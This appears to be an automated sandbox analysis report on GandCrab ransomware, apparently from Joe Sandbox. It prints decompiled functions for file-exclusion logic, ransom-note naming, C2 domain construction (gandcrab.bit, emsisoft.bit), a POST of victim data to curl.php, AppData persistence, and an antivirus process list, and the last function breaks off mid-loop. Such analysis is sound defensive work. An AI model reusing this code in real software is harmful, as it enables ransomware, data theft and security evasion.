S, xrefs: 00404DA8
d, xrefs: 00404DD2
d, xrefs: 00404DAF
s, xrefs: 00404DD9
o, xrefs: 00404D93
s, xrefs: 00404DB6
fabian wosar <3, xrefs: 00404E95
l, xrefs: 00404D81
r, xrefs: 00404DCB
o, xrefs: 00404DC4
r, xrefs: 00404DE0
., xrefs: 00404DBD

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
API String ID: 1490407255-783179298
Opcode ID: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
Instruction ID: 87b3df06f302a376c278e654a4a7d1f30e625f23b6bcd530246e45e208265c66
Opcode Fuzzy Hash: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
Instruction Fuzzy Hash: FB31D8B1B01308ABEB109F95AD49BEE7FB5FB44714F104036E604F62D1D7F559448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406240 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406240(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00406403), ref: 0040624C
lstrlenW.KERNEL32(00000000), ref: 00406251
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0040627D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00406292
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0040629E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 004062AA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 004062B6
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 004062C2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 004062CE
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 004062DA
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 004062E6

Strings

thumbs.db, xrefs: 004062D4
autorun.inf, xrefs: 0040628C
ntuser.dat, xrefs: 00406298
ntuser.dat.log, xrefs: 004062C8
boot.ini, xrefs: 004062BC
iconcache.db, xrefs: 004062A4
desktop.ini, xrefs: 00406277
bootsect.bak, xrefs: 004062B0
GDCB-DECRYPT.txt, xrefs: 004062E0

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-634406045
Opcode ID: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
Instruction ID: 048d6f8e0bde4782f578bbb55f50fa0ba415c8db6f5f272e4d17ab509b81b6c5
Opcode Fuzzy Hash: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
Instruction Fuzzy Hash: 3D11546264262A2ADA6072799C05EEB129C4D91F5031603BBFC05F21C4DFFDDEA285BD

Uniqueness

Uniqueness Score: -1.00%

Function 00405370 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00405370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E004077F0( &_v36);
				_v24 = E00404EB0();
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74cb6981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0x40ffd0]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0x40ffe0]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0x40fff0]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0x410000]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0x410010]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0x410020]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E00408B30( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E00405270( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E00407A00( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E00405050(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74cb6981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

APIs

Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED

Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
Part of subcall function 00404EB0: Sleep.KERNEL32(00002710), ref: 00404F4C
Part of subcall function 00404EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
Part of subcall function 00404EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
Part of subcall function 00404EB0: wsprintfW.USER32 ref: 00404FA7
Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8

lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 00405395
VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 004053B5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 004053CA
lstrcatA.KERNEL32(00000000,data=), ref: 004053E8
lstrcatA.KERNEL32(00000000,004056FE), ref: 004053EE
lstrlenA.KERNEL32(00000000), ref: 00405442
_memset.LIBCMT ref: 0040545D
lstrcpyW.KERNEL32 ref: 00405471
lstrlenW.KERNEL32(?), ref: 00405489
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 004054A9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00405506
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00405512
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0040551E
InternetCloseHandle.WININET(?), ref: 00405528

Strings

curl.php?token=, xrefs: 0040546B
POST, xrefs: 0040549A
data=, xrefs: 004053E2

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
Instruction ID: 4aa36092560c0acaf7b062926e9d70cdf9a0aa4eca25d73af60562301bb62425
Opcode Fuzzy Hash: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
Instruction Fuzzy Hash: 54519671E0031A66DB109BA5DD45FEEBB7CFB48300F104176FA44B6191DB786A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E00407BA0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E00407C60( &_v20, lstrlenW( &_v20));
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E00407BA0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E00402890(_v28, _t50);
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E00402960(_t57, _t75);
					L17:
					ExitThread(0);
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 00402B7D

Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00402B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00402BE4
lstrcatW.KERNEL32(00000000,?), ref: 00402BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 00402BF4
wsprintfW.USER32 ref: 00402C35
ExitThread.KERNEL32 ref: 00402C47

Strings

.exe, xrefs: 00402BEE
\Microsoft\, xrefs: 00402BDE
U, xrefs: 00402B75
AppData, xrefs: 00402B97
I, xrefs: 00402B6C
"%s", xrefs: 00402C2F
P, xrefs: 00402B55

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
Instruction ID: 1f7025583fece4150ab6efb2fb4095bab450847bdb3333ccf3c22af7b910d208
Opcode Fuzzy Hash: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
Instruction Fuzzy Hash: 0841A771204311ABE304EF219E4DB5F77A8AF84704F04443EB555B62D2DBB8A908CBAF

Uniqueness

Uniqueness Score: -1.00%

Function 00407369 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 123
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407369(signed int __eax, intOrPtr __edx, void* __esi) {
				signed int _t51;
				signed int _t56;
				void* _t58;
				long _t59;
				void* _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr _t85;
				WCHAR* _t88;
				intOrPtr _t93;
				signed int _t95;
				intOrPtr _t100;
				void* _t102;
				void* _t104;
				void* _t106;

				_t102 = __esi;
				_t93 = __edx;
				_t51 = __eax;
				do {
					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
					_t95 = GetDriveTypeW(_t104 - 0x24);
					if(_t95 <= 2 || _t95 == 5) {
						L6:
					} else {
						 *((short*)(_t104 - 0x20)) = 0;
						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
						 *((short*)(_t104 - 0x20)) = 0x5c;
						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
						lstrcatW( *(_t102 + 0x7c), "_");
						if(GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10) == 0) {
							lstrcatW( *(_t102 + 0x7c), L"0,");
							goto L6;
						} else {
							 *((intOrPtr*)(_t104 - 8)) = E00408470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t85 = _t93;
							_t75 = E00408470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
							_t100 =  *((intOrPtr*)(_t104 - 8));
							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t104 - 8)) = _t85;
							_t77 = lstrlenW( *(_t102 + 0x7c));
							_push(_t85);
							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
							_t80 = lstrlenW( *(_t102 + 0x7c));
							_push( *((intOrPtr*)(_t104 - 8)));
							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
							_t106 = _t106 + 0x20;
							lstrcatW( *(_t102 + 0x7c), ",");
						}
					}
					_t51 =  *(_t104 - 0x18) + 1;
					 *(_t104 - 0x18) = _t51;
				} while (_t51 < 0x1b);
				_t56 = lstrlenW( *(_t102 + 0x7c));
				_t88 =  *(_t102 + 0x7c);
				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
				if( *(_t102 + 0x80) != 0) {
					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4);
					 *(_t102 + 0x84) = _t58;
					if(_t58 == 0) {
						L13:
						 *(_t102 + 0x80) = 0;
					} else {
						_push(_t88);
						_t59 = E004068F0(_t58);
						if(_t59 == 0) {
							VirtualFree( *(_t102 + 0x84), _t59, 0x8000);
							goto L13;
						}
					}
				}
				return 1;
			}

APIs

GetDriveTypeW.KERNEL32(?), ref: 0040737D
lstrcatW.KERNEL32(?,?), ref: 004073A4
lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00404590,00000000,?,00000000), ref: 0040741E
wsprintfW.USER32 ref: 00407438
lstrlenW.KERNEL32(?), ref: 00407446
wsprintfW.USER32 ref: 0040745A
lstrcatW.KERNEL32(?,004107D0), ref: 0040746D
lstrcatW.KERNEL32(?,004107D4), ref: 00407479
lstrlenW.KERNEL32(?), ref: 00407494
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 004074B7
VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 004074DE

Strings

%I64u/, xrefs: 00407432
%I64u, xrefs: 00407451

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$FreeVirtualwsprintf$AllocDiskDriveSpaceType
String ID: %I64u$%I64u/
API String ID: 1496313530-2450085969
Opcode ID: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
Instruction ID: f56a49131db2d010194e37aaef5b9fe43e36d368a28beff8943d66c84b1e197f
Opcode Fuzzy Hash: f37d999d73b9fcab265fb1937d7ee25b9929f392ff6dfbe524c0eec2842da8f8
Instruction Fuzzy Hash: A4418371A00608AFDB219BA4CD45FAEBBF9FF48300F10442AE655F32A1DA35F950CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 84
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404EB0() {
				intOrPtr _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v72;
				WCHAR* _t26;
				long _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t41;
				void* _t46;
				signed int _t50;
				void* _t52;

				asm("movdqa xmm0, [0x410960]");
				_v20 =  &_v72;
				_v16 =  &_v36;
				_v36 = 0x69736d65;
				_v32 = 0x74666f73;
				_v28 = 0x7469622e;
				_v24 = 0;
				asm("movdqu [ebp-0x44], xmm0");
				_v56 = 0;
				_v52 = 0x646e6167;
				_v48 = 0x62617263;
				_v44 = 0x7469622e;
				_v40 = 0;
				_v12 =  &_v52;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t38 = _t26;
				if(_t38 != 0) {
					_t40 = 0;
					_t50 = 0;
					while(1) {
						_v8 =  *((intOrPtr*)(_t52 + _t50 * 4 - 0x10));
						_t50 =  ==  ? 0 : _t50 + 1;
						if(_t40 == 0xffffffff) {
							Sleep(0x2710);
						}
						_t46 = VirtualAlloc(0, 2 + lstrlenW(_t38) * 2, 0x3000, 4);
						_t41 = _t46;
						E00404D60(_t41, _v8);
						_t33 = lstrcmpiA(_t46, "fabian wosar <3");
						if(_t33 != 0) {
							break;
						}
						VirtualFree(_t46, _t33, 0x8000);
						_t40 = _t41 | 0xffffffff;
					}
					wsprintfW(_t38, L"%S", _t46);
					VirtualFree(_t46, 0, 0x8000);
					_t26 = _t38;
				}
				return _t26;
			}

0x00404eb6
0x00404ecc
0x00404ed7
0x00404ee4
0x00404eeb
0x00404ef2
0x00404ef9
0x00404efd
0x00404f02
0x00404f06
0x00404f0d
0x00404f14
0x00404f1b
0x00404f1f
0x00404f22
0x00404f24
0x00404f28
0x00404f2e
0x00404f30
0x00404f32
0x00404f37
0x00404f3f
0x00404f45
0x00404f4c
0x00404f4c
0x00404f6f
0x00404f71
0x00404f73
0x00404f7e
0x00404f86
0x00000000
0x00000000
0x00404f8f
0x00404f9b
0x00404f9b
0x00404fa7
0x00404fb8
0x00404fbe
0x00404fbe
0x00404fc6

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
Sleep.KERNEL32(00002710), ref: 00404F4C
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
wsprintfW.USER32 ref: 00404FA7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8

Strings

crab, xrefs: 00404F0D
gand, xrefs: 00404F06
fabian wosar <3, xrefs: 00404F78
.bit, xrefs: 00404F14
soft, xrefs: 00404EEB
emsi, xrefs: 00404EE4
.bit, xrefs: 00404EF2

Memory Dump Source

Source File: 00000015.00000002.305258673.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.305252568.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305265358.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305269157.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305274923.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000015.00000002.305279189.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$.bit$crab$emsi$fabian wosar <3$gand$soft
API String ID: 2709691373-1090818981
Opcode ID: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
Instruction ID: 12e809f3953ca4ef3e333bd49a631b39bc1f07fb3bc4506d08caa0eda9158355
Opcode Fuzzy Hash: edd6b09a321c72d76f54713700b51503e045287bd620de7e5e9023b5f02d4a1f
Instruction Fuzzy Hash: 34317AB1A04319ABDB11DFA4AD45BAEBBB8FB84710F10013AF701B72D1D7B45905CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407520 Relevance: 25.6, APIs: 17, Instructions: 150
memorystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00407520(void** _a4, intOrPtr* _a8) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				WCHAR* _v76;
				WCHAR* _v80;
				void* _t46;
				void* _t49;
				WCHAR* _t56;
				void** _t68;
				void* _t75;
				long _t76;
				WCHAR* _t77;
				signed int _t79;
				void* _t83;

				_t46 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t68 = _a4;
				 *_t68 = _t46;
				_v80 = L"AVP.EXE";
				_v76 = L"ekrn.exe";
				_v72 = L"avgnt.exe";
				_v68 = L"ashDisp.exe";
				_v64 = L"NortonAntiBot.exe";
				_v60 = L"Mcshield.exe";
				_v56 = L"avengine.exe";
				_v52 = L"cmdagent.exe";
				_v48 = L"smc.exe";
				_v44 = L"persfw.exe";
				_v40 = L"pccpfw.exe";
				_v36 = L"fsguiexe.exe";
				_v32 = L"cfp.exe";
				_v28 = L"msmpeng.exe";
				_t75 = VirtualAlloc(0, 4, 0x3000, 4);
				_v24 = _t75;
				if(_t75 == 0) {
					L3:
					return 0;
				} else {
					 *_t75 = 0x22c;
					_t49 = CreateToolhelp32Snapshot(2, 0);
					_v20 = _t49;
					if(_t49 != 0xffffffff) {
						_t79 = 0;
						_push(_t75);
						_v12 = 0;
						_a4 = 0;
						_v16 = 0;
						_v8 = 0;
						if(Process32FirstW(_t49) != 0) {
							L6:
							while(_t79 == 0) {
								_t77 = _t75 + 0x24;
								while(lstrcmpiW( *(_t83 + _t79 * 4 - 0x4c), _t77) != 0) {
									_t79 = _t79 + 1;
									if(_t79 < 0xe) {
										continue;
									} else {
										_t79 = _v8;
									}
									L15:
